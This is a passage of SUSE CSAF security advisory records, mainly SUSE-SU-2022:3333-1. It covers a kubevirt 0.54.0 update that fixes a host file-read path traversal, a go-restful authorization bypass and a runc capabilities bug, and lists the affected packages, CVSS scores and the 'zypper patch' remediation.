Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 4, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2022-09-20T15:19:24Z", details: "low", }, ], title: "CVE-2022-29162", }, ], }
suse-su-2022:3333-1
Vulnerability from csaf_suse
Published
2022-09-22 06:46
Modified
2022-09-22 06:46
Summary
Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container
Notes
Title of the patch
Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container
Description of the patch
This update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container fixes the following issues:
The kubevirt stack was updated to version 0.54.0
Release notes https://github.com/kubevirt/kubevirt/releases/tag/v0.54.0
Security fixes:
- CVE-2022-1798: Fix arbitrary file read on the host from KubeVirt VMs (bsc#1202516)
Security fixes in vendored dependencies:
- CVE-2022-1996: Fixed go-restful CORS bypass bsc#1200528)
- CVE-2022-29162: Fixed runc incorrect handling of inheritable capabilities in default configuration (bsc#1199460)
- Fix containerdisk unmount logic
- Support topology spread constraints
- Update libvirt-go to fix memory leak
- Pack nft rules and nsswitch.conf for virt-handler
- Only create 1MiB-aligned disk images (bsc#1199603)
- Avoid to return nil failure message
- Use semantic equality comparison
- Drop kubevirt-psp-caasp.yaml
- Allow to configure utility containers for update test
- Symlink nsswitch.conf and nft rules to proper locations
- Drop unused package libvirt-client
- Install vim-small instead of vim
- Remove unneeded libvirt-daemon-driver-storage-core
- Install missing packages ethtool and gawk. Fixes bsc#1199392
Patchnames
SUSE-2022-3333,SUSE-SLE-Module-Containers-15-SP4-2022-3333,openSUSE-SLE-15.4-2022-3333
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container", title: "Title of the patch", }, { category: "description", text: "This update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container fixes the following issues:\n\nThe kubevirt stack was updated to version 0.54.0\n\nRelease notes https://github.com/kubevirt/kubevirt/releases/tag/v0.54.0\n\nSecurity fixes:\n\n- CVE-2022-1798: Fix arbitrary file read on the host from KubeVirt VMs (bsc#1202516)\n\nSecurity fixes in vendored dependencies:\n\n- CVE-2022-1996: Fixed go-restful CORS bypass bsc#1200528)\n- CVE-2022-29162: Fixed runc incorrect handling of inheritable capabilities in default configuration (bsc#1199460)\n\n- Fix containerdisk unmount logic\n- Support topology spread constraints\n- Update libvirt-go to fix memory leak\n- Pack nft rules and nsswitch.conf for virt-handler\n- Only create 1MiB-aligned disk images (bsc#1199603)\n- Avoid to return nil failure message\n- Use semantic equality comparison\n- Drop kubevirt-psp-caasp.yaml\n- Allow to configure utility containers for update test\n- Symlink nsswitch.conf and nft rules to proper locations\n- Drop unused package libvirt-client\n- Install vim-small instead of vim\n- Remove unneeded libvirt-daemon-driver-storage-core\n- Install missing packages ethtool and gawk. Fixes bsc#1199392\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2022-3333,SUSE-SLE-Module-Containers-15-SP4-2022-3333,openSUSE-SLE-15.4-2022-3333", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2022_3333-1.json", }, { category: "self", summary: "URL for SUSE-SU-2022:3333-1", url: "https://www.suse.com/support/update/announcement/2022/suse-su-20223333-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2022:3333-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012328.html", }, { category: "self", summary: "SUSE Bug 1199392", url: "https://bugzilla.suse.com/1199392", }, { category: "self", summary: "SUSE Bug 1199460", url: "https://bugzilla.suse.com/1199460", }, { category: "self", summary: "SUSE Bug 1199603", url: "https://bugzilla.suse.com/1199603", }, { category: "self", summary: "SUSE Bug 1200528", url: "https://bugzilla.suse.com/1200528", }, { category: "self", summary: "SUSE Bug 1202516", url: "https://bugzilla.suse.com/1202516", }, { category: "self", summary: "SUSE CVE CVE-2022-1798 page", url: "https://www.suse.com/security/cve/CVE-2022-1798/", }, { category: "self", summary: "SUSE CVE CVE-2022-1996 page", url: "https://www.suse.com/security/cve/CVE-2022-1996/", }, { category: "self", summary: "SUSE CVE CVE-2022-29162 page", url: "https://www.suse.com/security/cve/CVE-2022-29162/", }, ], title: "Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container", tracking: { current_release_date: "2022-09-22T06:46:45Z", generator: { date: "2022-09-22T06:46:45Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2022:3333-1", initial_release_date: "2022-09-22T06:46:45Z", revision_history: [ { date: "2022-09-22T06:46:45Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "kubevirt-tests-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-tests-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-tests-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", product: { name: "kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", product_id: "kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", }, }, { category: "product_version", name: "obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", product: { name: "obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", product_id: "obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Containers 15 SP4", product: { name: "SUSE Linux Enterprise Module for Containers 15 SP4", product_id: "SUSE Linux Enterprise Module for Containers 15 SP4", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-containers:15:sp4", }, }, }, { category: "product_name", name: "openSUSE Leap 15.4", product: { name: "openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.4", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "kubevirt-manifests-0.54.0-150400.3.3.2.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP4", product_id: "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "SUSE Linux Enterprise Module for Containers 15 SP4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP4", product_id: "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "SUSE Linux Enterprise Module for Containers 15 SP4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-manifests-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-tests-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-tests-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", }, product_reference: "kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, { category: "default_component_of", full_product_name: { name: "obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64 as component of openSUSE Leap 15.4", product_id: "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", }, product_reference: "obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", relates_to_product_reference: "openSUSE Leap 15.4", }, ], }, vulnerabilities: [ { cve: "CVE-2022-1798", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-1798", }, ], notes: [ { category: "general", text: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, references: [ { category: "external", summary: "CVE-2022-1798", url: "https://www.suse.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "SUSE Bug 1202516 for CVE-2022-1798", url: "https://bugzilla.suse.com/1202516", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, ], threats: [ { category: "impact", date: "2022-09-22T06:46:45Z", details: "important", }, ], title: "CVE-2022-1798", }, { cve: "CVE-2022-1996", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-1996", }, ], notes: [ { category: "general", text: "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, references: [ { category: "external", summary: "CVE-2022-1996", url: "https://www.suse.com/security/cve/CVE-2022-1996", }, { category: "external", summary: "SUSE Bug 1200528 for CVE-2022-1996", url: "https://bugzilla.suse.com/1200528", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 9.1, baseSeverity: "CRITICAL", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, ], threats: [ { category: "impact", date: "2022-09-22T06:46:45Z", details: "critical", }, ], title: "CVE-2022-1996", }, { cve: "CVE-2022-29162", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-29162", }, ], notes: [ { category: "general", text: "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where `runc exec --cap` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in runc 1.1.2. This fix changes `runc exec --cap` behavior such that the additional capabilities granted to the process being executed (as specified via `--cap` arguments) do not include inheritable capabilities. In addition, `runc spec` is changed to not set any inheritable capabilities in the created example OCI spec (`config.json`) file.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, references: [ { category: "external", summary: "CVE-2022-29162", url: "https://www.suse.com/security/cve/CVE-2022-29162", }, { category: "external", summary: "SUSE Bug 1199460 for CVE-2022-29162", url: "https://bugzilla.suse.com/1199460", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 4, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-container-disk-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-manifests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-tests-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-api-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-controller-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-handler-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-launcher-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virt-operator-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:kubevirt-virtctl-0.54.0-150400.3.3.2.x86_64", "openSUSE Leap 15.4:obs-service-kubevirt_containers_meta-0.54.0-150400.3.3.2.x86_64", ], }, ], threats: [ { category: "impact", date: "2022-09-22T06:46:45Z", details: "low", }, ], title: "CVE-2022-29162", }, ], }
wid-sec-w-2023-0204
Vulnerability from csaf_certbund
Published
2023-01-25 23:00
Modified
